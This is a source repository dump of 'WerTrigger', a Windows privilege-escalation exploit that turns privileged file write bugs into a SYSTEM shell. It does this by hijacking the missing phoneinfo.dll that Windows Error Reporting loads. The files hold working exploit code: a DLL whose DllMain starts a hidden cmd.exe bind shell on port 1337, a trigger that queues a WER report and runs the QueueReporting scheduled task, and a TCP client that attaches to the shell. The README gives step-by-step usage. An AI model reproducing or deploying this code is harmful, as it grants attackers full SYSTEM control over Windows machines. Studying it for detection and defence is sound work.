├── bin ├── .v ├── Report.wer ├── WerTrigger.exe └── phoneinfo.dll ├── src ├── .text ├── phoneinfo │ ├── phoneinfo │ │ ├── phoneinfo.def │ │ ├── BindShell.h │ │ ├── framework.h │ │ ├── phoneinfo.vcxproj.user │ │ ├── pch.cpp │ │ ├── pch.h │ │ ├── phoneinfo.cpp │ │ ├── BindShell.cpp │ │ ├── phoneinfo.vcxproj.filters │ │ └── phoneinfo.vcxproj │ └── phoneinfo.sln └── WerTrigger │ ├── WerTrigger │ ├── WerTrigger.vcxproj.user │ ├── TcpClient.h │ ├── WerTrigger.vcxproj.filters │ ├── WerTrigger.cpp │ ├── TcpClient.cpp │ └── WerTrigger.vcxproj │ └── WerTrigger.sln ├── werTrigger.jpg └── README.md /bin/.v: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/.text: -------------------------------------------------------------------------------- 1 | test file 2 | -------------------------------------------------------------------------------- /bin/Report.wer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/bin/Report.wer -------------------------------------------------------------------------------- /werTrigger.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/werTrigger.jpg -------------------------------------------------------------------------------- /bin/WerTrigger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/bin/WerTrigger.exe -------------------------------------------------------------------------------- /bin/phoneinfo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/bin/phoneinfo.dll -------------------------------------------------------------------------------- 
/src/phoneinfo/phoneinfo/phoneinfo.def: -------------------------------------------------------------------------------- 1 | LIBRARY phoneinfo 2 | 3 | EXPORTS 4 | DllMain PRIVATE 5 | BindMe PRIVATE 6 | 7 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/BindShell.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | class BindShell 4 | { 5 | public: 6 | BindShell(); 7 | ~BindShell(); 8 | 9 | int Run(unsigned short port); 10 | }; 11 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 
6 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/TcpClient.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN 4 | 5 | #include 6 | 7 | #define BUFSIZE 4096 8 | 9 | class TcpClient 10 | { 11 | public: 12 | TcpClient(); 13 | ~TcpClient(); 14 | 15 | int connectTCP(const char* hostname, const char* port); 16 | 17 | private: 18 | static DWORD WINAPI ReceiveDataFromSocket(LPVOID lpvParam); 19 | static DWORD WINAPI SendDataFromConsole(LPVOID lpvParam); 20 | }; 21 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.cpp: -------------------------------------------------------------------------------- 1 | // phoneinfo.cpp : Defines the entry point for the DLL application. 
2 | #include "pch.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "BindShell.h" 11 | 12 | #define BUFSIZE 1024 13 | 14 | 15 | HRESULT __stdcall BindMe() 16 | { 17 | BindShell bindShell; 18 | bindShell.Run(1337); 19 | 20 | return S_OK; 21 | } 22 | 23 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 24 | { 25 | switch (ul_reason_for_call) 26 | { 27 | case DLL_PROCESS_ATTACH: 28 | //xCall(L"DllMain()"); 29 | BindMe(); 30 | break; 31 | case DLL_THREAD_ATTACH: 32 | case DLL_THREAD_DETACH: 33 | case DLL_PROCESS_DETACH: 34 | break; 35 | } 36 | return TRUE; 37 | } 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WerTrigger 2 | Weaponizing privileged file write bugs with Windows Problem Reporting 3 | 4 | #### Short Description: 5 | I found that phoneinfo.dll (which is missing from the system32 directory) is loaded by wermgr.exe (Windows Problem Reporting) when I enable boot logging in Procmon. This means `phoneinfo.dll` is loaded after a reboot. Then I asked [@jonasLyk](https://twitter.com/jonasLyk) whether I could trigger the loading of `phoneinfo.dll` without a reboot, and he said "yes!". 
That is how this trigger came about. 6 | 7 | #### *Note:* 8 | *You can also use [@itm4n](https://twitter.com/itm4n)'s [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) as a weapon for privileged file write bugs, and other techniques are listed in [FileWrite2system](https://github.com/sailay1996/awesome_windows_logical_bugs/blob/master/FileWrite2system.txt)* 9 | 10 | #### For testing purposes: 11 | 1. **As an administrator**, copy `phoneinfo.dll` to `C:\Windows\System32\` (in this test the manual copy stands in for the privileged file write bug). 12 | 2. Place the `Report.wer` file and `WerTrigger.exe` in the same directory. 13 | 3. Then, run `WerTrigger.exe`. 14 | 4. Enjoy a shell as NT AUTHORITY\SYSTEM. 15 | 16 | ![test1](https://github.com/sailay1996/WerTrigger/blob/master/werTrigger.jpg) 17 | 18 | *by [@404death](https://twitter.com/404death)* 19 | 20 | *Thanks to: [@jonasLyk](https://twitter.com/jonasLyk) for the advice on the `without reboot technique`* 21 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/BindShell.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | #include 4 | 5 | #include "BindShell.h" 6 | 7 | #pragma comment(lib, "Ws2_32.lib") 8 | 9 | BindShell::BindShell() 10 | { 11 | 12 | } 13 | 14 | BindShell::~BindShell() 15 | { 16 | WSACleanup(); 17 | } 18 | 19 | int BindShell::Run(unsigned short port) 20 | { 21 | WSADATA WSAData; 22 | SOCKADDR_IN sin; 23 | SOCKET sock; 24 | 25 | if (!WSAStartup(MAKEWORD(2, 0), &WSAData)) 26 | { 27 | sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0); 28 | sin.sin_family = AF_INET; 29 | sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK); // INADDR_ANY 30 | sin.sin_port = htons(port); 31 | 32 | if (!bind(sock, (SOCKADDR*)& sin, sizeof(SOCKADDR_IN))) 33 | { 34 | listen(sock, SOMAXCONN); 35 | 36 | SOCKET tmp = accept(sock, 0, 0); 37 | STARTUPINFO si = { 0 }; 38 | PROCESS_INFORMATION pi = { 0 }; 39 | wchar_t buff[2010]; 40 | 41 | si.cb = sizeof(si); 42 | 
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 43 | si.wShowWindow = SW_HIDE; 44 | si.hStdOutput = (HANDLE)tmp; 45 | si.hStdError = (HANDLE)tmp; 46 | si.hStdInput = (HANDLE)tmp; 47 | 48 | GetEnvironmentVariable(L"COMSPEC", buff, 2000); 49 | 50 | CreateProcess(buff, 0, 0, 0, true, CREATE_NEW_CONSOLE, 0, 0, &si, &pi); 51 | 52 | WaitForSingleObject(pi.hProcess, INFINITE); 53 | 54 | CloseHandle(pi.hProcess); 55 | CloseHandle(pi.hThread); 56 | 57 | closesocket(tmp); 58 | } 59 | } 60 | 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29709.97 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "phoneinfo", "phoneinfo\phoneinfo.vcxproj", "{64CCD6B9-CF59-4A19-AA05-64D65712E4B3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x64.ActiveCfg = Debug|x64 17 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x64.Build.0 = Debug|x64 18 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x86.ActiveCfg = Debug|Win32 19 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x86.Build.0 = Debug|Win32 20 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x64.ActiveCfg = Release|x64 21 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x64.Build.0 = Release|x64 22 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x86.ActiveCfg = Release|Win32 23 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | 
GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {D848926A-9000-4995-98B0-B1C0D724FB75} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29709.97 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WerTrigger", "WerTrigger\WerTrigger.vcxproj", "{CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x64.ActiveCfg = Debug|x64 17 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x64.Build.0 = Debug|x64 18 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x86.ActiveCfg = Debug|Win32 19 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x86.Build.0 = Debug|Win32 20 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x64.ActiveCfg = Release|x64 21 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x64.Build.0 = Release|x64 22 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x86.ActiveCfg = Release|Win32 23 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {6815CE15-B02F-4456-A4D4-2481782195C1} 30 | EndGlobalSection 31 | EndGlobal 32 | 
-------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | 40 | 41 | Source Files 42 | 43 | 44 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.cpp: -------------------------------------------------------------------------------- 1 | // WerTrigger.cpp : Windows Error Reporting Trigger by @404death ! 
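//
// NOTE(review): the names of the system headers below were lost when this listing was extracted.
#include
#include
#include
#include "TcpClient.h"

#define BUFSIZE 4096

/**
 * Entry point of the trigger program.
 *
 * Copies Report.wer from the current directory into a new ReportQueue
 * sub-directory, starts the "QueueReporting" scheduled task through
 * cmd / SCHTASKS, waits two seconds, removes the copied report and its
 * directory again, and then makes up to three attempts to connect to
 * 127.0.0.1:1337 with TcpClient.
 *
 * None of the file, directory or process calls has its result checked; only
 * the outcome of the TCP connection decides which final message is printed.
 *
 * NOTE(review): for detection, the artifacts visible in this function are the
 * a_b_c_d_e directory created under ReportQueue, the SCHTASKS /RUN of the
 * QueueReporting task from a user process, and a loopback connection to TCP
 * port 1337.
 *
 * @param argc unused
 * @param argv unused
 * @return always 0
 */
int wmain(int argc, wchar_t** argv)
{

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(STARTUPINFO));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    si.cb = sizeof(STARTUPINFO);

    wprintf_s(L"[+] Windows Error Reporting Trigger by @404death !\n");

    CreateDirectoryW(L"c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\a_b_c_d_e", NULL);

    // Last argument true: the copy fails if a Report.wer is already present there.
    CopyFileW(L"Report.wer", L"c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\a_b_c_d_e\\Report.wer", true);

    // submitting problem report with schtasks

    WCHAR cmdLine4[BUFSIZE];
    // ZeroMemory takes a byte count, so this clears only the first BUFSIZE bytes of
    // the BUFSIZE-element WCHAR array; that is enough for StringCchCat to see an
    // empty string.
    ZeroMemory(cmdLine4, BUFSIZE);
    StringCchCat(cmdLine4, BUFSIZE, L"cmd /c SCHTASKS /RUN /TN \"Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\" > nul 2>&1");

    CreateProcess(nullptr, cmdLine4, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &si, &pi);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    Sleep(2000);

    // clean dir
    DeleteFileW(L"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e\\Report.wer");
    RemoveDirectoryW(L"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e");

    // TCP connecting

    TcpClient tcpClient;
    int iRes = 0;

    // Try to trigger DLL loading
    wprintf_s(L"[+] Trigger launched.\n");
    wprintf_s(L"[*] TCP connecting...\n");

    // Wait a bit before trying to connect to the bind shell.
    //
    wprintf_s(L"[*] Waiting for the DLL to be loaded...\n");

    Sleep(2000);

    iRes = tcpClient.connectTCP("127.0.0.1", "1337");

    if (iRes != 0)
    {
        wprintf_s(L"[*] Retrying ...\n");

        iRes = tcpClient.connectTCP("127.0.0.1", "1337");
    }

    if (iRes != 0)
    {
        wprintf_s(L"[*] Retrying ...\n");


        iRes = tcpClient.connectTCP("127.0.0.1", "1337");
    }

    if (iRes != 0)
    {
        wprintf_s(L"[-] Exploit failed.");
    }
    else
    {
        wprintf_s(L"[+] Exploit successfull.");
    }

    return 0;

}
--------------------------------------------------------------------------------
/src/WerTrigger/WerTrigger/TcpClient.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the names of the system headers below were lost when this listing was extracted.
#include
#include
#include
#include
#include
#include "TcpClient.h"

#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Mswsock.lib")
#pragma comment (lib, "AdvApi32.lib")

/** Constructs the client; Winsock is initialised later, inside connectTCP(). */
TcpClient::TcpClient()
{

}

/**
 * Calls WSACleanup() once more on destruction.
 *
 * NOTE(review): connectTCP() already pairs its own WSAStartup() with a
 * WSACleanup() on the paths shown here, so this call looks unbalanced; confirm
 * before relying on it.
 */
TcpClient::~TcpClient()
{
    WSACleanup();
}

/**
 * Connects to hostname:port over TCP and relays the console to the socket.
 *
 * After the connection is made, one thread prints everything received from the
 * socket and a second thread sends console input to it. The call blocks until
 * the receiving thread ends (peer closed the connection or recv failed).
 *
 * @param hostname host name or address passed to getaddrinfo()
 * @param port     service name or port number passed to getaddrinfo()
 * @return 0 after a completed session, 1 on a Winsock, resolve, connect or
 *         shutdown failure, -1 if a worker thread could not be created
 */
int TcpClient::connectTCP(const char* hostname, const char* port)
{
    WSADATA wsaData;
    SOCKET socketClient = INVALID_SOCKET;
    struct addrinfo* result = NULL, * ptr = NULL, hints;
    int iResult = 0;
    DWORD dwThreadIdOut;
    DWORD dwThreadIdIn;
    HANDLE hThreadOut;
    HANDLE hThreadIn;

    // Initialize Winsock
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        wprintf_s(L"WSAStartup failed with error: %d\n", iResult);
        return 1;
    }

    ZeroMemory(&hints, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    // Resolve the server address and port
    iResult = getaddrinfo(hostname, port, &hints, &result);
    if (iResult != 0) {
        wprintf_s(L"getaddrinfo failed with error: %d\n", iResult);
        WSACleanup();
        return 1;
    }

    // Attempt to connect to an address until one succeeds
    for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

        // Create a SOCKET for connecting to server
        socketClient = socket(ptr->ai_family, ptr->ai_socktype,
            ptr->ai_protocol);
        if (socketClient == INVALID_SOCKET) {
            wprintf_s(L"socket failed with error: %ld\n", WSAGetLastError());
            // The address list was previously leaked on this early return.
            freeaddrinfo(result);
            WSACleanup();
            return 1;
        }

        // Connect to server.
        iResult = connect(socketClient, ptr->ai_addr, (int)ptr->ai_addrlen);
        if (iResult == SOCKET_ERROR) {
            closesocket(socketClient);
            socketClient = INVALID_SOCKET;
            continue;
        }
        break;
    }

    freeaddrinfo(result);

    if (socketClient == INVALID_SOCKET) {
        wprintf_s(L"[-] Unable to connect to server!\n");
        WSACleanup();
        return 1;
    }

    // Create a thread to receive data from the socket in an infinite loop
    hThreadOut = CreateThread(NULL, 0, ReceiveDataFromSocket, (LPVOID)socketClient, 0, &dwThreadIdOut);
    if (hThreadOut == NULL)
    {
        wprintf_s(L"[-] Create thread failed: ReceiveDataFromSocket\n");
        // No worker is running yet, so the socket can be released directly.
        closesocket(socketClient);
        WSACleanup();
        return -1;
    }

    // Create a thread to read user input in an infinite loop
    hThreadIn = CreateThread(NULL, 0, SendDataFromConsole, (LPVOID)socketClient, 0, &dwThreadIdIn);
    if (hThreadIn == NULL)
    {
        wprintf_s(L"[-] Create thread failed: SendDataFromConsole\n");
        // Closing the socket makes the receiver's recv() fail, so the thread
        // ends before its handle and Winsock are released.
        closesocket(socketClient);
        WaitForSingleObject(hThreadOut, INFINITE);
        CloseHandle(hThreadOut);
        WSACleanup();
        return -1;
    }
    wprintf_s(L"[+] phoneinfo.dll has been loaded.\n");
    wprintf_s(L"[+] Connected.\n");
    wprintf_s(L"[+] Spawning shell...\n");

    // Wait for the socket to be closed
    WaitForSingleObject(hThreadOut, INFINITE);

    // shutdown the connection since no more data will be sent
    iResult = shutdown(socketClient, SD_SEND);
    if (iResult == SOCKET_ERROR) {
        wprintf_s(L"shutdown failed with error: %d\n", WSAGetLastError());
        // The thread handles were previously leaked on this path.
        CloseHandle(hThreadIn);
        CloseHandle(hThreadOut);
        closesocket(socketClient);
        WSACleanup();
        return 1;
    }

    // cleanup
    // NOTE(review): the console thread is not waited for; it may still be blocked
    // in ReadFile() holding the socket value that is closed here.
    CloseHandle(hThreadIn);
    CloseHandle(hThreadOut);
    closesocket(socketClient);
    WSACleanup();

    return 0;
}

/**
 * Thread routine: prints everything received on the socket to stdout.
 *
 * @param lpvParam the SOCKET to read from, passed by value in the pointer
 * @return always 0; the loop ends when recv() returns 0 or an error
 */
DWORD WINAPI TcpClient::ReceiveDataFromSocket(LPVOID lpvParam)
{
    int iResult;
    SOCKET socketClient = (SOCKET)lpvParam;
    char bufReceive[BUFSIZE];

    while (true)
    {
        // Read at most BUFSIZE - 1 bytes and terminate explicitly: a recv() that
        // filled the whole buffer used to leave no NUL for printf("%s") and made
        // it read past the end of the array.
        iResult = recv(socketClient, bufReceive, BUFSIZE - 1, 0);
        if (iResult > 0)
        {
            bufReceive[iResult] = '\0';
            printf("%s", bufReceive);
        }
        else
            break;
    }
    return 0;
}

/**
 * Thread routine: forwards console input to the socket.
 *
 * When the input contains both '\r' and '\n', the first '\r' is rewritten to
 * '\n' and the text is cut at the first '\n' before sending.
 *
 * @param lpvParam the SOCKET to write to, passed by value in the pointer
 * @return 1 if the stdin handle is invalid, otherwise 0 once reading or
 *         sending stops
 */
DWORD WINAPI TcpClient::SendDataFromConsole(LPVOID lpvParam)
{
    HANDLE hStdin;
    BOOL bSuccess = FALSE;
    DWORD dwRead = 0;
    SOCKET socketClient = (SOCKET)lpvParam;
    int iResult = 0;
    char bufCmd[BUFSIZE];
    char* pCr = NULL;
    char* pLf = NULL;

    // Get a handle on standard input
    hStdin = GetStdHandle(STD_INPUT_HANDLE);
    if (hStdin == INVALID_HANDLE_VALUE)
        return 1;

    while (true)
    {
        // Keep one byte free for the terminator; ReadFile() does not add one, and
        // strchr()/strlen() below used to run over stale or uninitialised stack
        // bytes.
        bSuccess = ReadFile(hStdin, bufCmd, BUFSIZE - 1, &dwRead, NULL);
        if (bSuccess == FALSE || dwRead == 0)
            break;  // read error or end of input

        bufCmd[dwRead] = '\0';

        pCr = strchr(bufCmd, '\r');
        if (pCr != NULL)
        {
            pLf = strchr(bufCmd, '\n');
            if (pLf != NULL)
            {
                pCr[0] = '\n';
                pLf[0] = 0;
            }
        }

        iResult = send(socketClient, bufCmd, (int)strlen(bufCmd), 0);
        if (iResult == SOCKET_ERROR) {
            printf("send failed with error: %d\n", WSAGetLastError());
            break;
        }
    }
    return 0;
}
--------------------------------------------------------------------------------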
/src/WerTrigger/WerTrigger/WerTrigger.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F} 24 | Win32Proj 25 | WerTrigger 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | 116 | 117 | Level3 118 | true 119 | true 120 | true 121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Console 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | 134 | 135 | Level3 136 | true 137 | true 138 | true 139 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3} 24 | 
Win32Proj 25 | phoneinfo 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | true 90 | WIN32;_DEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 91 | true 92 | pch.h 93 | 94 | 95 | Console 96 | true 97 | phoneinfo.def 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | true 105 | _DEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 106 | true 107 | pch.h 108 | 109 | 110 | Console 111 | true 112 | phoneinfo.def 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | true 120 | true 121 | true 122 | WIN32;NDEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 123 | true 124 | pch.h 125 | 126 | 127 | Console 128 | true 129 | true 130 | false 131 | phoneinfo.def 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | true 139 | true 140 | true 141 | NDEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 142 | true 143 | pch.h 144 | 145 | 146 | Console 147 | true 148 | true 149 | false 150 | phoneinfo.def 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | Create 163 | Create 164 | Create 165 | Create 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | --------------------------------------------------------------------------------